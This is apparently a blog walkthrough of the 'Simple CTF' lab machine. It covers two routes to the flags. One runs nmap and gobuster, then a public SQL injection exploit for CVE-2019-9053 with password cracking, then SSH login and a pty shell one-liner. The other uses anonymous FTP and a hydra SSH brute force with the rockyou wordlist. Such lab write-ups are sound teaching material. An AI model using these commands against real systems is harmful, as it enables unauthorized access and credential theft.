SIMPLE CTF Walkthrough

Hello guys, Let check another blog of mine this time i successfully captuer the flag in two different methods, Let get start it…

NOTE:The first step is Reconnissance, why because how much of target information u have that much easy to hack into the systems or severs

Step1: Nmap scanning

Command: nmap -sS -sV -A <Traget-IP>

The port 21, 80, 2222 which are FTP, HTTP, SSH . The port 80 contain the robots.txt which is informtion disclosuer and may be more directory’s may present let check by using gobuster tool.

First Method:

Sterp 2: GOBUSTER

Command: gobuster dir -u http://<target-IP> / -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

We found the hidden directory (/simple) let open that path in the website.

There is website is running which is CMS let check what are the vulnerables and cve no are available based on this website.

We found that it is sql injection base exploit & it’s CVE-2019–9053 let search the exploit in the exploitdb website.

There is exploit present in the exploitdb and it contain python script to do the sql injection attack, let download and run it to get the credentials.

Command: python 46635.py -u http://<Target-IP>/simple/ — crack -w /usr/share/wordlists/rockyou.txt

You will face the error while running the python script so i gave the solution to solve it check the below images.

Then again run the command it start doing the sql injection.

We got the user and password let use this cred try to login into the ssh port 2222.

After getting the login access the shell was not stable for that i use the python command which make the shell stable

Command: python -c ‘import pty;pty.spawn(“/bin/bash”)’

I found the user.txt which contain the flag.

Then i need to find the root.txt, but i successfully escalate the root privilege check the images below.

Then click enter you will get root shell. There is root flag open it by using the nano or vim.

Second Method:

If us check the nmap image there it given that we can login into FTP as anonymous user let try login into it.

we can successfully login into the FTP then i found the folder which is Pub then go there i found the FORMitch.txt document then i use command to pull into my system.

Command: get ForMitch.txt

Then I opend it I found the text which send to the user his name is mitch u can see the txt name it given ForMitch.

Then i use hydra to crack it.

Command: hydra -l mitch -P /usr/share/wordlists/rockyou.txt <Target-Ip> -s 2222 ssh

We successfully get the flag then do same as i do previous login in to the ssh and get flags.

Hurryy….!🎉Successfully we capture the flag..👌